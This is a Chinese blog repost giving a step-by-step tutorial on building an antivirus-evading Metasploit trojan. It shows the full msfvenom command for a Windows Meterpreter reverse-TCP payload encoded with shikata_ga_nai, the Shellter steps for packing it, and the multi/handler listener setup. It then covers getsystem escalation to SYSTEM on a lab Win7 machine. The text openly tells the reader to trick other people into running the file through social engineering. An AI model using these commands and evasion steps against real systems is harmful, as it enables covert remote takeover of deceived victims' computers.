msf反弹木马之免杀

admin 2021年9月10日10:47:34评论285 views字数 1261阅读4分12秒阅读模式

原理


利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。


准备


win7靶机 ip :192.168.56.130

kali攻击机 ip: 192.168.56.135


##实战开始

1.打开kali机,在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe


LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。

lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?

> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。

-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码

-i 5为使用刚才设定的编码方式对目标进行5次编码


2.命令行输入

shellter

第一个选项选择A

msf反弹木马之免杀


3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。

然后等待一段时间······

msf反弹木马之免杀

注意,虽然看着不动,但是上面那个数字一直在跳,所以不是你卡住了~

msf反弹木马之免杀

4.然后选择Y


5.选择L,payload index 选择1

msf反弹木马之免杀

6.设置LHOST以及LPORT

msf反弹木马之免杀

等个大概2秒钟,就结束了~

免杀木马制作完成。

命令行输入

msfconsole

进入metasploit。

然后输入

use exploit/multi/handler

开启监听模式

接下来就是设置参数了,可以使用option命令来查看需要设置的参数。主要设置三个:payload、LHOST、LPORT,需要跟木马一样,复制一下就行

set payload windows/meterpreter/reverse_tcpset lhost 192.168.56.135set lport 1234

这里大小写随意,都可以被识别。

随后输入

exploit

执行监听命令,也就是攻击开始~


kali端操作结束!


然后利用社会工程学等方式诱骗其他人点击这玩意,就被攻击了。


现在假装win7被骗了,无意中点了我的反弹木马:

msf反弹木马之免杀


然后输入

shell

就可以获取对方管理员权限。

在输入shell之前,输入getsystem,获得system权限以后,再输入shell就可以获得最高权限啦~

msf反弹木马之免杀

使用echo %username%可以输出使用者的名字,这里是SJX-PC$,如果是管理员的话,只会显示管理员账号(我这里是“sjx”),而且,看前面的内容也可以知道是system权限:

msf反弹木马之免杀


CSDN博主「imbia」原文链接:https://blog.csdn.net/satasun/article/details/105441604


---》

推荐公众号:

    每日分享红蓝队技术文章与工具使用 下载方式、以及不定期的安全类书籍抽奖~


msf反弹木马之免杀

本文始发于微信公众号(LemonSec):msf反弹木马之免杀

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月10日10:47:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   msf反弹木马之免杀https://cn-sec.com/archives/467798.html

发表评论

匿名网友 填写信息